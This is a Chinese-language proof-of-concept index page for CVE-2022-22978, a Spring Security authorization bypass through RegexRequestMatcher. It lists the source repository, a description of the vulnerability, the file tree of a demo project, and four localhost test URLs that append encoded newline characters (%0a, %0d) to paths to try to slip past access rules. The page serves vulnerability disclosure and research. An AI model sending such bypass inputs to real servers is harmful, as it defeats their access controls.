POC详情: 70ec55192e8d4bfe61a51a65be7f3196c5d402bd

来源
https://github.com/aeifkz/CVE-2022-22978
关联漏洞
标题: VMware Spring Security 授权问题漏洞 (CVE-2022-22978)
描述:VMware Spring Security是美国威睿(VMware)公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。 VMware Spring Security 存在授权问题漏洞,该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符(.)处理不受信任的输入时存在输入验证错误。
描述
CVE-2022-22978 POC Project
介绍
#  CVE-2022-22978
Spring Security 

Pass Spring Security (成功) <br/>
http://localhost:9090/login%0a <br/>

Pass Spring Security with SayMyName (失敗) <br/>
http://localhost:9090/name%0d <br/>

Bypass Spring Security with Custom RBAC (失敗) <br/>
http://localhost:9090/admin/admin%0d <br/>

Bypass Spring Security with Annotation RBAC (失敗) <br/>
http://localhost:9090/user/user%0a <br/>
文件快照

 [4.0K]  /data/pocs/70ec55192e8d4bfe61a51a65be7f3196c5d402bd
├── [ 848]  HELP.md
├── [ 10K]  mvnw
├── [6.6K]  mvnw.cmd
├── [1.5K]  pom.xml
├── [ 397]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [4.0K]  java
    │   │   └── [4.0K]  com
    │   │       └── [4.0K]  example
    │   │           └── [4.0K]  demo
    │   │               ├── [ 306]  DemoApplication.java
    │   │               ├── [1.6K]  HelloWorld.java
    │   │               └── [1.5K]  WebSecurityConfig.java
    │   └── [4.0K]  resources
    │       ├── [ 250]  application.yml
    │       └── [4.0K]  templates
    │           └── [ 191]  hello.html
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  com
                └── [4.0K]  example
                    └── [4.0K]  demo
                        └── [ 206]  DemoApplicationTests.java

13 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。